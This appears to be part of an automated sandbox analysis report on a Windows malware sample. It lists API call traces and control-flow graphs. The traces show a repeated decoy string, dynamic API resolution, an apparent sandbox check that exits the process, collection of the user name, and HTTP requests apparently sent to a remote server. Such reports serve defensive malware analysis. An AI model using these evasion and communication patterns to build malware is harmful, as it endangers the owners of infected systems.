                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                              • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                              • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                              • strlen.MSVCRT ref: 004046F0
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 2127927946-2218711628
                              • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                              • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                              • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                              • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 752 419860-419874 call 419750 755 419a93-419af2 LoadLibraryA * 5 752->755 756 41987a-419a8e call 419780 GetProcAddress * 21 752->756 758 419af4-419b08 GetProcAddress 755->758 759 419b0d-419b14 755->759 756->755 758->759 761 419b46-419b4d 759->761 762 419b16-419b41 GetProcAddress * 2 759->762 763 419b68-419b6f 761->763 764 419b4f-419b63 GetProcAddress 761->764 762->761 765 419b71-419b84 GetProcAddress 763->765 766 419b89-419b90 763->766 764->763 765->766 767 419bc1-419bc2 766->767 768 419b92-419bbc GetProcAddress * 2 766->768 768->767
                              APIs
                              • GetProcAddress.KERNEL32(75900000,00710C20), ref: 004198A1
                              • GetProcAddress.KERNEL32(75900000,00710C80), ref: 004198BA
                              • GetProcAddress.KERNEL32(75900000,00710C98), ref: 004198D2
                              • GetProcAddress.KERNEL32(75900000,00710AE8), ref: 004198EA
                              • GetProcAddress.KERNEL32(75900000,00710B00), ref: 00419903
                              • GetProcAddress.KERNEL32(75900000,0070F5A0), ref: 0041991B
                              • GetProcAddress.KERNEL32(75900000,007061E0), ref: 00419933
                              • GetProcAddress.KERNEL32(75900000,007064C0), ref: 0041994C
                              • GetProcAddress.KERNEL32(75900000,007109E0), ref: 00419964
                              • GetProcAddress.KERNEL32(75900000,00710A10), ref: 0041997C
                              • GetProcAddress.KERNEL32(75900000,00710A28), ref: 00419995
                              • GetProcAddress.KERNEL32(75900000,00710B18), ref: 004199AD
                              • GetProcAddress.KERNEL32(75900000,00706280), ref: 004199C5
                              • GetProcAddress.KERNEL32(75900000,00710B60), ref: 004199DE
                              • GetProcAddress.KERNEL32(75900000,00710B30), ref: 004199F6
                              • GetProcAddress.KERNEL32(75900000,00706200), ref: 00419A0E
                              • GetProcAddress.KERNEL32(75900000,00710A88), ref: 00419A27
                              • GetProcAddress.KERNEL32(75900000,00710A40), ref: 00419A3F
                              • GetProcAddress.KERNEL32(75900000,007063C0), ref: 00419A57
                              • GetProcAddress.KERNEL32(75900000,00710A70), ref: 00419A70
                              • GetProcAddress.KERNEL32(75900000,00706300), ref: 00419A88
                              • LoadLibraryA.KERNEL32(00710A58,?,00416A00), ref: 00419A9A
                              • LoadLibraryA.KERNEL32(00710B48,?,00416A00), ref: 00419AAB
                              • LoadLibraryA.KERNEL32(00710BA8,?,00416A00), ref: 00419ABD
                              • LoadLibraryA.KERNEL32(00710BC0,?,00416A00), ref: 00419ACF
                              • LoadLibraryA.KERNEL32(00710D70,?,00416A00), ref: 00419AE0
                              • GetProcAddress.KERNEL32(75070000,00710D10), ref: 00419B02
                              • GetProcAddress.KERNEL32(75FD0000,00710CC8), ref: 00419B23
                              • GetProcAddress.KERNEL32(75FD0000,00710CB0), ref: 00419B3B
                              • GetProcAddress.KERNEL32(75A50000,00710CE0), ref: 00419B5D
                              • GetProcAddress.KERNEL32(74E50000,00706480), ref: 00419B7E
                              • GetProcAddress.KERNEL32(76E80000,0070F660), ref: 00419B9F
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: (q$@q$NtQueryInformationProcess$Xq$pq$pq$q$q$ap
                              • API String ID: 2238633743-688008255
                              • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                              • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                              • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                              • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                              APIs
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                              • StrCmpCA.SHLWAPI(?,00740FA8), ref: 0040493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                              • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,00740F38), ref: 00404DE8
                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                              • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                              • HttpOpenRequestA.WININET(00000000,00740F78,?,00740690,00000000,00000000,00400100,00000000), ref: 00404B15
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                              • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 2402878923-2180234286
                              • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                              • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                              • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                              • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                              • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocNameProcessUser
                              • String ID:
                              • API String ID: 1206570057-0
                              • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                              • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                              • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                              • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                              APIs
                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                              • ExitProcess.KERNEL32 ref: 0040117E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                              • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                              • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                              • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                              Control-flow Graph

                              • Executed
                              • Not Executed
